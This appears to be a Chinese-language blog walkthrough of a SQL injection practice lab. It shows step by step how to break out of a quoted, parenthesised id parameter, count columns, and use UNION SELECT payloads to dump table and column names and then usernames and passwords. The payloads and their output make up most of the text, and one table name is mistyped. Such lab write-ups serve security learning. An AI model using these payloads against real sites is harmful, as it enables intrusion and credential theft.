初始页面:
![](https://img-blog.csdnimg.cn/7b2c983e6a734c50840e8c0b59916286.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
url入手,给个参数?id=1,回显正常。
![](https://img-blog.csdnimg.cn/2e15d8bce9fe4c02880b3084176cff3d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
当我们给的参数是?id=1'时报错,说明他是字符型注入,原本的SQL语句加上我们给的就成了?id='1'', 回显报错,而且报错还多了一个括号。
![](https://img-blog.csdnimg.cn/cb729158926c40b392dc9757689dbd92.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
猜想SQL语句是这样的:select * from user where id=('$id')
我们后面的 ') 可以注释掉,所以我们只要闭合前面的 (' 即可,所以我们的payload变成了这样:
?id=1')--+
![](https://img-blog.csdnimg.cn/63f05b0435894336af12e34c07868bd1.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
之后就是order by猜解字段数了:
payload:?id=1') order by $number--+($number是变量,记得注释掉后面)
$number=3, 回显正常
![](https://img-blog.csdnimg.cn/4c9c5201b0c2461ca7ff5e1ec5295a90.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
$number=4, 回显不正常
所以字段数是3.
接下来是union联合查询,payload:?id=-1') union select 1,2,3--+
![](https://img-blog.csdnimg.cn/ee4a5e57a7f14826b01f32e1cbbf5784.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
具体回显字段位置是2和3.
那接下来就是爆信息了。
database():security
version():5.7.26
user():root@localhost(数据库最高权限用户root)
@@version_compile_os:Win64
![](https://img-blog.csdnimg.cn/67d5710ffb9a4ed5afc29ba1f3fcdabe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
获取表名,payload:?id=-1') union select 1,2,group_concat(hex(table_name)) from information_schema.tales where table_schema=database()--+(这里使用hex十六进制接收数据是因为我还没改数据库和靶场的编码问题)
![](https://img-blog.csdnimg.cn/6dd24d360fb94a4699f8d0a76840b01b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
656D61696C73:emails
7265666572657273:referers
756167656E7473:uagents
7573657273:users
到这儿我们一般会根据名字来更进一步,那我们就先搞users表,获取列名,上payload:
?id=-1') union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--+
(屏幕截不完)
![](https://img-blog.csdnimg.cn/5def51c076314d83b9ab934c51923bbf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
55534552:USER
43555252454E545F434F4E4E454354494F4E53:CURRENT_CONNECTIONS
544F54414C5F434F4E4E454354494F4E53:TOTAL_CONNECTIONS
6964:id
757365726E616D65:username
70617373776F7264:password
接下来就是获取username和password了,获得之后就可以为所欲为了,payload:
?id=-1') union select 1,2,group_concat(username,0x3a,password) from users--+
(0x3a是冒号哦!)
![](https://img-blog.csdnimg.cn/af1fe108be6e49e8b05ba7896bbfd726.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5Lq66Ze05LiN5YC85b6X4pGk,size_20,color_FFFFFF,t_70,g_se,x_16)
之后就可以为所以为了!